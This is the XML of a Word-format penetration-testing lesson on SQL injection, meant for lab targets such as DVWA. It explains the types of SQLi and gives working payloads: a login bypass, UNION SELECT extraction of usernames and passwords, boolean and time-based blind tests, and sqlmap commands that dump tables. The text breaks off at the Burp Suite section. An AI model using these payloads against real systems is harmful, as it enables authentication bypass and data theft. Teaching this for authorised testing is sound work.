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69B77" w14:textId="77777777" w:rsidR="00EA6038" w:rsidRPr="0091689F" w:rsidRDefault="00000000" w:rsidP="0091689F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Day 16 — SQL Injection (SQLi) Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1446FA07" w14:textId="77777777" w:rsidR="00EA6038" w:rsidRPr="0091689F" w:rsidRDefault="00000000" w:rsidP="0091689F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ethical use only. This material is for training purposes in a legal lab setup such as DVWA, bWAPP, Mutillidae, or WebGoat. Do not attempt against any system without explicit written permission. Real-world exploitation is illegal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F29133" w14:textId="77777777" w:rsidR="00EA6038" w:rsidRPr="0091689F" w:rsidRDefault="00000000" w:rsidP="0091689F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1) What is SQL?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B8FCE9" w14:textId="77777777" w:rsidR="00EA6038" w:rsidRPr="0091689F" w:rsidRDefault="00000000" w:rsidP="0091689F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SQL (Structured Query Language) is the standard language used to communicate with and manage data in relational databases such as MySQL, PostgreSQL, SQL Server, Oracle, and SQLite. It allows you to store, retrieve, modify, and delete data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CB5701" w14:textId="77777777" w:rsidR="00EA6038" w:rsidRPr="0091689F" w:rsidRDefault="00000000" w:rsidP="0091689F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>**Basic SQL Commands:**</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>SELECT - Retrieve data from tables</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>INSERT - Add new data</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>UPDATE - Modify existing data</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>DELETE - Remove data</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>ORDER BY - Sort results</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>WHERE - Filter results</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>JOIN - Combine data from multiple tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D5A278" w14:textId="77777777" w:rsidR="00EA6038" w:rsidRPr="0091689F" w:rsidRDefault="00000000" w:rsidP="0091689F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2) What is SQL Injection?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C6BF05" w14:textId="77777777" w:rsidR="00EA6038" w:rsidRPr="0091689F" w:rsidRDefault="00000000" w:rsidP="0091689F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SQL Injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It usually occurs when user input is embedded directly into SQL statements without proper sanitization or parameterization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749AEC18" w14:textId="77777777" w:rsidR="00EA6038" w:rsidRPr="0091689F" w:rsidRDefault="00000000" w:rsidP="0091689F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3) What Can a Successful SQL Injection Do?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76604748" w14:textId="77777777" w:rsidR="00EA6038" w:rsidRPr="0091689F" w:rsidRDefault="00000000" w:rsidP="0091689F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>- Extract sensitive data (usernames, passwords, personal information)</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>- Bypass authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>- Modify or delete data</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>- Execute administrative operations on the database</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>- Read or write files from the server</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>- In some cases, execute operating system commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669B8B04" w14:textId="77777777" w:rsidR="00EA6038" w:rsidRPr="0091689F" w:rsidRDefault="00000000" w:rsidP="0091689F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4) Types of SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78310E03" w14:textId="77777777" w:rsidR="00EA6038" w:rsidRPr="0091689F" w:rsidRDefault="00000000" w:rsidP="0091689F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>**In-band SQLi** — Uses the same communication channel to launch attacks and gather results.</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>- Error-based SQLi: Relies on database error messages</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>- UNION-based SQLi: Uses UNION SELECT to retrieve additional data</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>**Blind SQLi** — Results are not directly visible, inference is needed.</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>- Boolean-based: True/False conditions change the response</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>- Time-based: Database delays indicate conditions</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>**Out-of-band SQLi** — Uses alternative channels like DNS or HTTP for data retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF38912" w14:textId="77777777" w:rsidR="00EA6038" w:rsidRPr="0091689F" w:rsidRDefault="00000000" w:rsidP="0091689F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5) Practical — Manual SQLi Testing Workflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DE344E" w14:textId="77777777" w:rsidR="00EA6038" w:rsidRPr="0091689F" w:rsidRDefault="00000000" w:rsidP="0091689F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>**Step 1: Identify Entry Points**</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>Look for GET or POST parameters, cookies, or headers that might be included in SQL queries.</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>**Step 2: Single Quote Test**</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>Insert a single quote `'` into the parameter and observe if the application throws an SQL error.</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>**Step 3: Boolean Logic Testing**</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>Example:</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>' AND 1=1 --+  (should return normal page)</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>' AND 1=2 --+  (should return different or empty page)</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>**Step 4: Determine Column Count**</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>Use ORDER BY incrementally:</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>ORDER BY 1</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>ORDER BY 2</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>... until error occurs.</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>**Step 5: UNION SELECT Data Extraction**</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>UNION SELECT NULL, NULL, 'test', NULL ... — until 'test' is visible on page.</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>**Step 6: Enumerate Database Information**</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>MySQL example:</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>UNION SELECT NULL, version(), user(), database()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68897A16" w14:textId="77777777" w:rsidR="00EA6038" w:rsidRPr="0091689F" w:rsidRDefault="00000000" w:rsidP="0091689F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>6) Practical — Login Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1D919A" w14:textId="77777777" w:rsidR="00EA6038" w:rsidRPr="0091689F" w:rsidRDefault="00000000" w:rsidP="0091689F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>**Vulnerable PHP code:**</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>$user = $_POST['user'];</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>$pass = $_POST['pass'];</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>$sql = "SELECT id FROM users WHERE username='$user' AND password='$pass'";</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>**Payload:**</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>Username: ' OR '1'='1' -- -</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>Password: (leave blank)</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>This works because the WHERE condition becomes always true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7267CB8F" w14:textId="77777777" w:rsidR="00EA6038" w:rsidRPr="0091689F" w:rsidRDefault="00000000" w:rsidP="0091689F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>7) Practical — Blind SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F92EA7" w14:textId="77777777" w:rsidR="00EA6038" w:rsidRPr="0091689F" w:rsidRDefault="00000000" w:rsidP="0091689F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>**Boolean-based Example:**</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>' AND (SELECT 1) = 1 --+  → True</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>' AND (SELECT 1) = 2 --+  → False</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>**Time-based Example (MySQL):**</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>' AND IF(SUBSTRING(database(),1,1)='d', SLEEP(5), 0) --+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7F8053" w14:textId="77777777" w:rsidR="00EA6038" w:rsidRPr="0091689F" w:rsidRDefault="00000000" w:rsidP="0091689F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>8) Practical — UNION-based SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426AF12E" w14:textId="77777777" w:rsidR="00EA6038" w:rsidRPr="0091689F" w:rsidRDefault="00000000" w:rsidP="0091689F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>**When useful:** Page renders database query results directly.</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>**Steps:**</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>1. Find column count using ORDER BY</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>2. Identify visible column</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. Inject UNION SELECT with desired data</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>Example:</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>UNION SELECT NULL, username, password FROM users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB34376" w14:textId="77777777" w:rsidR="00EA6038" w:rsidRPr="0091689F" w:rsidRDefault="00000000" w:rsidP="0091689F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>9) Practical — Using sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472FBFDD" w14:textId="77777777" w:rsidR="00EA6038" w:rsidRPr="0091689F" w:rsidRDefault="00000000" w:rsidP="0091689F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>**Installation on Kali:**</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>sudo apt update &amp;&amp; sudo apt install sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>**Basic Usage:**</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>sqlmap -u "http://target.com/page.php?id=1" --dbs</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>**With Cookies:**</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>sqlmap -u "http://target.com/page.php?id=1" --cookie="PHPSESSID=abcd1234" --dbs</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>**From Request File:**</w:t>
      </w:r>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
        <w:t>sqlmap -r request.txt --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE04B65" w14:textId="77777777" w:rsidR="00EA6038" w:rsidRPr="0091689F" w:rsidRDefault="00000000" w:rsidP="0091689F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>10) Practical — Using Burp Suite for SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B90774" w14:textId="77777777" w:rsidR="00EA6038" w:rsidRPr="0091689F" w:rsidRDefault="00000000" w:rsidP="0091689F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0091689F">
        <w:rPr>
